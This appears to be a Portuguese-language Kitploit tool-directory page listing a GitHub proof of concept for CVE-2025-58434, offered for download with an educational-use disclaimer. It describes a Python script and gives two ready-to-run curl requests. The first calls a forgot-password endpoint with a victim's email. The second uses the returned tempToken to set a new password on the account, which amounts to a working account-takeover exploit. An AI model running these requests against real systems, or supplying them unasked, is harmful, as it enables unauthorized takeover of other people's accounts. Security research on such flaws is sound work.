Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-58434-PoC — Prova de Conceito CVE-2025-58434 | Kitploit
Ferramentas/GitHubGitHub/mananispiwpiw/cve-2025-58434-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubmananispiwpiw/cve-2025-58434-poc

CVE-2025-58434-PoC

Prova de Conceito CVE-2025-58434

Ver Repositório
1há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-58434 PoC

Script Python de prova de conceito para acionar POST /api/v1/account/forgot-password.

⚠️ Apenas para fins educacionais e pesquisa de segurança autorizada. Executar esta ferramenta contra sistemas que você não possui ou sem permissão por escrito para testar é ilegal.

Créditos

  • zaddy6 (Isaac David)
  • arthurgervais (Arthur Gervais)

Detalhes

  • PoC para CVE-2025-58434
  • Referência: https://github.com/advisories/GHSA-wgpv-6j63-x5ph

Arquivos

  • poc.py: solicita a URL/IP da máquina, protocolo opcional quando apenas host/IP for usado, e-mail alvo e senha; em seguida, envia a requisição e imprime o status HTTP, cabeçalhos e corpo da resposta similar ao curl -i
Baixar ferramenta

Uso

Execute:

root@kitploit:~
python3 poc.py

Em seguida, forneça:

  • URL/IP da máquina, como 10.10.11.10, http://10.10.11.10, ou https://target.example
  • protocolo se for solicitado ao usar apenas host/IP
  • endereço de e-mail
  • senha

curl equivalente

1ª Requisição

root@kitploit:~
curl -i -X POST https://<MACHINE_URL/IP>/api/v1/account/forgot-password \
  -H "Content-Type: application/json" \
  -d '{"user":{"email":"<[email protected]>"}}'

2ª Requisição

root@kitploit:~
curl -i -X POST https://<target>/api/v1/account/reset-password \
  -H "Content-Type: application/json" \
  -d '{
        "user":{
          "email":"<[email protected]>",
          "tempToken":"<tempToken>",
          "password":"NewSecurePassword123!"
        }
      }'